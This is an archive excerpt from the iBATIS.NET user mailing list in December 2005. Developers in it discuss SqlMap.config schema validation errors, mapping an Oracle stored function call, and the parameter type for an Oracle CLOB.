=A0 <providers resource=3D"C:\providers.config"/> =09 <database>=09 <provider name=3D"oracle9.2"/> <dataSource name=3D"Arquitectura"=20 connectionString=3D"${connectionString}"/> </database> <sqlMaps> <sqlMap resource=3D"C:\CONFIGURACION.xml"/> </sqlMaps> </sqlMapConfig> <!--CONFIGURACION.xml-----> <=3Fxml version=3D"1.0" encoding=3D"utf-8" =3F>=20 <sqlMap namespace=3D"Configuracion" xmlns:xsi=3D"http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation=3D"SqlMap.xsd"> <alias> <typeAlias alias=3D"configuracion" type=3D"Ma.Informacion.Configuracion, Ma.Informacion" /> </alias> <!-- XML "behind" document for the People service class. --> <statements> <!-- PROCEDMIENTO SELECT --> <select id=3D"CONFIGURACION"=20 resultClass=3D"configuracion"> SELECT * from configuracion </select> </statements> </sqlMap> Tnks --- "Hoffman, Ira" <[email protected]> escribi=F3: > That made Visual Studio 2005 feel better, but I am > still getting a fairly > lengthy error: >=20 > IBatisNet.Common.Exceptions.ConfigurationException:=20 > - The error occurred while Validate SqlMap config. > - The error occurred in The > 'http://ibatis.apache.org/dataMapper:sqlMapConfig' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:properties' > element is not > declared. > Could not find schema information for the attribute > 'file'. > The 'http://ibatis.apache.org/dataMapper:settings' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'useFullyQualifiedStatementNames'. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'cacheModelsEnabled'. > The 'http://ibatis.apache.org/dataMapper:database' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:provider' > element is not declared. > Could not find schema information for the attribute > 'name'. > The 'http://ibatis.apache.org/dataMapper:dataSource' > element is not > declared. > Could not find schema information for the attribute > 'name'. > Could not find schema information for the attribute > 'connectionString'. > The 'http://ibatis.apache.org/dataMapper:sqlMaps' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:sqlMap' > element is not declared. > Could not find schema information for the attribute > 'file'. > . ---> > IBatisNet.Common.Exceptions.ConfigurationException: > Invalid > SqlMap.config document. cause :The > 'http://ibatis.apache.org/dataMapper:sqlMapConfig' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:properties' > element is not > declared. > Could not find schema information for the attribute > 'file'. > The 'http://ibatis.apache.org/dataMapper:settings' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'useFullyQualifiedStatementNames'. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'cacheModelsEnabled'. > The 'http://ibatis.apache.org/dataMapper:database' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:provider' > element is not declared. > Could not find schema information for the attribute > 'name'. > The 'http://ibatis.apache.org/dataMapper:dataSource' > element is not > declared. > Could not find schema information for the attribute > 'name'. > Could not find schema information for the attribute > 'connectionString'. > The 'http://ibatis.apache.org/dataMapper:sqlMaps' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:sqlMap' > element is not declared. > Could not find schema information for the attribute > 'file'. >=20 > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode > section, String schemaFileName) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > --- End of inner exception stack trace --- > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String > resource, ConfigureHandler configureDelegate) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config > ureHandler configureDelegate) > at MerckSAS.Library.Services.Mapper.InitMapper() > in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 25 > at MerckSAS.Library.Services.Mapper.Instance() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 36 > at MerckSAS.Library.Services.Mapper.Get() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 45 > at MerckSasService..ctor() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line > 23 >=20 > I went to the URL for the dataMapper and the > document was not found. Could > this be a problem=3F >=20 > Thanks, > Ira >=20 >=20 > -----Original Message----- > From: Ron Grabowski [mailto:[email protected]]=20 > Sent: Wednesday, December 14, 2005 11:39 AM > To: [email protected] > Subject: Re: iBatis and Visual Studio 2005 Woes >=20 >=20 > The top of your SqlMap.config file should look > something like this: >=20 > <=3Fxml version=3D"1.0" encoding=3D"UTF-8" =3F> >=20 > xmlns:xsi=3D"http://www.w3.org/2001/XMLSchema-instance" > > >=20 > The top of your sqlMap files should look like this: >=20 > <=3Fxml version=3D"1.0" encoding=3D"UTF-8" =3F> > <sqlMap namespace=3D"Customer" > xmlns=3D"http://ibatis.apache.org/mapping" > xmlns:xsi=3D"http://www.w3.org/2001/XMLSchema-instance"> >=20 > ----- Original Message ---- > From: "Hoffman, Ira" <[email protected]> > To: "[email protected]" > <[email protected]> > Sent: Wednesday, December 14, 2005 6:25:25 AM > Subject: iBatis and Visual Studio 2005 Woes >=20 > All, >=20 > I am trying to develop a .NET 2.0 middle-tier that > leverages iBatis. I have > used iBatis before, in the Java world, and greatly > enjoyed it. However, I am > having problems getting the most basic configuration > working with Visual > Studio 2005 and iBatis. I have created a new ASP > .NET Web Service Project > and am unable to read the sqlMap.config properties > file. Here is the error > message: >=20 > IBatisNet.Common.Exceptions.ConfigurationException:=20 > - The error occurred while Validate SqlMap config. > - The error occurred in The 'file' attribute is not > declared. > The 'useFullyQualifiedStatementNames' attribute is > not declared. > The 'file' attribute is not declared. > . ---> > IBatisNet.Common.Exceptions.ConfigurationException: > Invalid > SqlMap.config document. cause :The 'file' attribute > is not declared. > The 'useFullyQualifiedStatementNames' attribute is > not declared. > The 'file' attribute is not declared. >=20 > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode > section, String schemaFileName) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > --- End of inner exception stack trace --- > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String >=20 =3D=3D=3D message truncated =3D=3D=3D =09 =09 =09 ______________________________________________=20 Renovamos el Correo Yahoo!=20 Nuevos servicios, m=E1s seguridad=20 http://correo.yahoo.es ---------------------------------------------------------------------------= --- Notice: This e-mail message, together with any attachments, contains = information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New = Jersey, USA 08889), and/or its affiliates (which may be known outside the = United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as = Banyu) that may be confidential, proprietary copyrighted and/or legally = privileged. It is intended solely for the use of the individual or entity = named on this message. If you are not the intended recipient, and have = received this message in error, please notify us immediately by reply e-mai= l= and then delete it from your system. ---------------------------------------------------------------------------= --- From [email protected] Fri Dec 16 19:37:38 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82652 invoked from network); 16 Dec 2005 19:37:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Dec 2005 19:37:37 -0000 Received: (qmail 18527 invoked by uid 500); 16 Dec 2005 19:37:37 -0000 Delivered-To: [email protected] Received: (qmail 18513 invoked by uid 500); 16 Dec 2005 19:37:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18501 invoked by uid 99); 16 Dec 2005 19:37:37 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 11:37:37 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO usryim08.merck.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 11:37:35 -0800 Received: from 161.129.204.104 by usryim08.merck.com with ESMTP (SMTP Relay); Fri, 16 Dec 2005 14:37:05 -0500 X-Server-Uuid: 5530B3F1-5061-49E5-AC39-9EA5D15363BB Received: from 161.129.204.104 by usrytw31.merck.com with ESMTP (Tumbleweed Email Firewall SMTP Relay (Email Firewall v6.1.1)); Fri, 16 Dec 2005 14:36:51 -0500 X-Server-Uuid: E1D334D3-E18D-4307-83C1-2B84D3407A0B Received: by usrygw32.merck.com with Internet Mail Service (5.5.2658.27) id <V7DA8BJ6>; Fri, 16 Dec 2005 14:36:51 -0500 Message-ID: <[email protected]> From: "Hoffman, Ira" <[email protected]> To: "'[email protected]'" <[email protected]> Subject: Calling an Oracle Function Using MS Oracle Provider and VS 2005 Date: Fri, 16 Dec 2005 14:36:47 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2658.27) X-WSS-ID: 6FBDC8D923O30074629-03-01 X-WSS-ID: 6FBDC8C221W12551513-07-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N All, I am able to call an Oracle function using The OracleClient Objects, but not using a data map. Here is the Oracle Client translation: OracleConnection rempOc = new OracleConnection(); rempOc.ConnectionString = "User Id=xxx;Password=xxxSS;Data Source=xxx;"; rempOc.Open(); OracleCommand regCompCmd = new OracleCommand("COMPOUND_PKG.REGISTERCOMPOUNDOPTMOLWEIGHT", rempOc); regCompCmd.CommandType = System.Data.CommandType.StoredProcedure; //OracleParameter retParm = new OracleParameter("RETURN_VALUE", OracleType.Number); OracleParameter retParm = new OracleParameter("RETURN_VALUE", OracleDbType.Single); retParm.Size = 22; retParm.Direction = System.Data.ParameterDirection.ReturnValue; regCompCmd.Parameters.Add(retParm); //OracleParameter nameParm = new OracleParameter("P_NAME", OracleType.VarChar); OracleParameter nameParm = new OracleParameter("P_NAME", OracleDbType.Varchar2); nameParm.Value = compound.Name; regCompCmd.Parameters.Add(nameParm); OracleParameter mwParm = new OracleParameter("P_MOLWEIGHT", OracleDbType.Single); mwParm.Value = compound.MolecularWeight; regCompCmd.Parameters.Add(mwParm); OracleParameter anParm = new OracleParameter("P_ALTERNATENAME", OracleDbType.Varchar2); anParm.Value = compound.AlternateName; regCompCmd.Parameters.Add(anParm); OracleParameter cdParm = new OracleParameter("P_CHANGEDATE", OracleDbType.Date); cdParm.Value = new DateTime(); regCompCmd.Parameters.Add(cdParm); regCompCmd.ExecuteScalar(); return Convert.ToInt32(retParm.Value); How would I translate this into a data map? Thanks, Ira ------------------------------------------------------------------------------ Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ------------------------------------------------------------------------------ From [email protected] Sat Dec 17 00:36:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 726 invoked from network); 17 Dec 2005 00:36:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Dec 2005 00:36:55 -0000 Received: (qmail 87551 invoked by uid 500); 17 Dec 2005 00:36:55 -0000 Delivered-To: [email protected] Received: (qmail 87536 invoked by uid 500); 17 Dec 2005 00:36:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87525 invoked by uid 99); 17 Dec 2005 00:36:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 16:36:54 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 16:36:53 -0800 Received: by wproxy.gmail.com with SMTP id 71so721968wri for <[email protected]>; Fri, 16 Dec 2005 16:36:32 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=SO/SkzBWn67e8EBp0yqfEAD3qet0esfWmT6TZdQRkNy/WwG0S1QFdRM8cUqBiDNr36xe0ssWoQj3+i1EFN4SF2FqFECEFQUsoxvYO/cu9dmULPc01S0FyuzL/efnJ9oKGocG7GhljoJyotnAHA6WL4tkAaD1vMV1oZdG7rIgGKI= Received: by 161.129.204.104 with SMTP id p15mr4432130wrb; Fri, 16 Dec 2005 16:36:32 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 16 Dec 2005 16:36:32 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 16 Dec 2005 19:36:32 -0500 From: Roberto R <[email protected]> To: [email protected] Subject: Re: Calling an Oracle Function Using MS Oracle Provider and VS 2005 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_8254_1912874.1134779792568" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_8254_1912874.1134779792568 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Can you use the function in a SQL select statement and pass the parameters in that way? Or wrap the function with a procedure? Otherwise, there's JIRA for a request. http://issues.apache.org/jira/browse/IBATISNET :-) Roberto On 12/16/05, Hoffman, Ira <[email protected]> wrote: > > All, > > I am able to call an Oracle function using The OracleClient Objects, but > not > using a data map. Here is the Oracle Client translation: > > OracleConnection rempOc =3D new OracleConnection(); > rempOc.ConnectionString =3D "User Id=3Dxxx;Password=3Dxxx= SS;Data > Source=3Dxxx;"; > rempOc.Open(); > OracleCommand regCompCmd =3D new > OracleCommand("COMPOUND_PKG.REGISTERCOMPOUNDOPTMOLWEIGHT", rempOc); > > regCompCmd.CommandType =3D > System.Data.CommandType.StoredProcedure; > > //OracleParameter retParm =3D new > OracleParameter("RETURN_VALUE", OracleType.Number); > OracleParameter retParm =3D new > OracleParameter("RETURN_VALUE", OracleDbType.Single); > retParm.Size =3D 22; > retParm.Direction =3D > System.Data.ParameterDirection.ReturnValue; > regCompCmd.Parameters.Add(retParm); > > > //OracleParameter nameParm =3D new OracleParameter("P_NAM= E", > OracleType.VarChar); > OracleParameter nameParm =3D new OracleParameter("P_NAME"= , > OracleDbType.Varchar2); > nameParm.Value =3D compound.Name; > regCompCmd.Parameters.Add(nameParm); > > OracleParameter mwParm =3D new > OracleParameter("P_MOLWEIGHT", > OracleDbType.Single); > mwParm.Value =3D compound.MolecularWeight; > regCompCmd.Parameters.Add(mwParm); > > OracleParameter anParm =3D new > OracleParameter("P_ALTERNATENAME", OracleDbType.Varchar2); > anParm.Value =3D compound.AlternateName; > regCompCmd.Parameters.Add(anParm); > > OracleParameter cdParm =3D new > OracleParameter("P_CHANGEDATE", > OracleDbType.Date); > cdParm.Value =3D new DateTime(); > regCompCmd.Parameters.Add(cdParm); > > regCompCmd.ExecuteScalar(); > return Convert.ToInt32(retParm.Value); > > How would I translate this into a data map? > > Thanks, > Ira > > > > -------------------------------------------------------------------------= ----- > Notice: This e-mail message, together with any attachments, contains > information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, Ne= w > Jersey, USA 08889), and/or its affiliates (which may be known outside the > United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, a= s > Banyu) that may be confidential, proprietary copyrighted and/or legally > privileged. It is intended solely for the use of the individual or entity > named on this message. If you are not the intended recipient, and have > received this message in error, please notify us immediately by reply e-m= ail > and then delete it from your system. > > -------------------------------------------------------------------------= ----- > ------=_Part_8254_1912874.1134779792568 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Can you use the function in a SQL select statement and pass the parameters = in that way?&nbsp; Or wrap the function with a procedure?<br><br>Otherwise,= there's JIRA for a request.&nbsp; <a href=3D"http://issues.apache.org/jira= /browse/IBATISNET"> http://issues.apache.org/jira/browse/IBATISNET</a><br><br>:-)<br><br>Robert= o<br><br><div><span class=3D"gmail_quote">On 12/16/05, <b class=3D"gmail_se= ndername">Hoffman, Ira</b> &lt;<a href=3D"mailto:[email protected]">ira= [email protected] </a>&gt; wrote:</span><blockquote class=3D"gmail_quote" style=3D"border-lef= t: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1= ex;">All,<br><br>I am able to call an Oracle function using The OracleClien= t Objects, but not <br>using a data map. Here is the Oracle Client translation:<br><br>&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;OracleConnection rempOc =3D new OracleConnection();<br>&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;rempOc.ConnectionString =3D &quot;User Id=3Dxxx;Password=3Dx= xxSS;Data<br>Source=3Dxxx;&quot;; <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;rempOc.Open();<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OracleComma= nd regCompCmd =3D new<br>OracleCommand(&quot;COMPOUND_PKG.REGISTERCOMPOUNDO= PTMOLWEIGHT&quot;, rempOc);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;regCompCmd.CommandT= ype =3D<br>System.Data.CommandType.StoredProcedure ;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//OracleParameter retParm =3D new<br>OraclePa= rameter(&quot;RETURN_VALUE&quot;, OracleType.Number);<br>&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;OracleParameter retParm =3D new<br>OracleParameter(&quot;RETURN_VALUE&qu= ot;, OracleDbType.Single );<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;retParm.Size =3D 22;<br>&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ret= Parm.Direction =3D<br>System.Data.ParameterDirection.ReturnValue;<br>&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;regCompCmd.Parameters.Add(retParm);<br><br><br>&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;//OracleParameter nameParm =3D new OracleParameter(&quot;P_NAME&quo= t;, <br>OracleType.VarChar);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OracleParameter nameParm = =3D new OracleParameter(&quot;P_NAME&quot;,<br>OracleDbType.Varchar2);<br>&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;nameParm.Value =3D compound.Name;<br>&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;regCompCmd.Parameters.Add (nameParm);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OracleParameter mwParm =3D new Orac= leParameter(&quot;P_MOLWEIGHT&quot;,<br>OracleDbType.Single);<br>&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;mwParm.Value =3D compound.MolecularWeight;<br>&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;regCompCmd.Parameters.Add (mwParm);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OracleParameter anParm =3D new<br>Ora= cleParameter(&quot;P_ALTERNATENAME&quot;, OracleDbType.Varchar2);<br>&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;anParm.Value =3D compound.AlternateName;<br>&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;regCompCmd.Parameters.Add (anParm);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OracleParameter cdParm =3D new Oracle= Parameter(&quot;P_CHANGEDATE&quot;,<br>OracleDbType.Date);<br>&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;cdParm.Value =3D new DateTime();<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;regCompCmd= .Parameters.Add (cdParm);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;regCompCmd.ExecuteScalar();<br>&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;return Convert.ToInt32(retParm.Value);<br><br>How would I tr= anslate this into a data map?<br><br>Thanks,<br>Ira<br><br><br>------------= ------------------------------------------------------------------ <br>Notice:&nbsp;&nbsp;This e-mail message, together with any attachments, = contains information of Merck &amp; Co., Inc. (One Merck Drive, Whitehouse = Station, New Jersey, USA 08889), and/or its affiliates (which may be known = outside the United States as Merck Frosst, Merck Sharp &amp; Dohme or MSD a= nd in Japan, as Banyu) that may be confidential, proprietary copyrighted an= d/or legally privileged. It is intended solely for the use of the individua= l or entity named on this message.&nbsp;&nbsp;If you are not the intended r= ecipient, and have received this message in error, please notify us immedia= tely by reply e-mail and then delete it from your system. <br>-----------------------------------------------------------------------= -------<br></blockquote></div><br> ------=_Part_8254_1912874.1134779792568-- From [email protected] Mon Dec 19 22:54:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34921 invoked from network); 19 Dec 2005 22:54:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Dec 2005 22:54:55 -0000 Received: (qmail 13137 invoked by uid 500); 19 Dec 2005 22:54:54 -0000 Delivered-To: [email protected] Received: (qmail 13117 invoked by uid 500); 19 Dec 2005 22:54:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13078 invoked by uid 99); 19 Dec 2005 22:54:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Dec 2005 14:54:53 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Dec 2005 14:54:52 -0800 Received: from cmxrly02.futureshop.com (localhost [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jBJMkiB3020788 for <[email protected]>; Mon, 19 Dec 2005 14:46:44 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jBJMke5I020776 for [email protected]; Mon, 19 Dec 2005 14:46:40 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jBJMkaB3020681 for <[email protected]>; Mon, 19 Dec 2005 14:46:40 -0800 (PST) Received: from CPREXN010-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 19 Dec 2005 14:54:04 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C604EF.26F23C92" Subject: What dbType will be used for Oracle CLOB ? Date: Mon, 19 Dec 2005 14:54:22 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: What dbType will be used for Oracle CLOB ? thread-index: AcYE8hR5zPlIyHnVT0Kb0Xxz1Flehg== From: "Tony Shi" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 19 Dec 2005 22:54:04.0383 (UTC) FILETIME=[1C38FEF0:01C604EF] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C604EF.26F23C92 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi all, =20 I try to call a stored procedure with a parameter in Oracle CLOB type I'm not sure which dbtype will be used in parameterMap for this parameter. Is it "Raw" type? I currently use oracle10.1 provider, database is Oracle 9i and latest iBatis DataMapper codes from SVN. =20 Anybody has idea for this? =20 Thanks in advance. =20 Tony =20 =20 ------_=_NextPart_001_01C604EF.26F23C92 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p 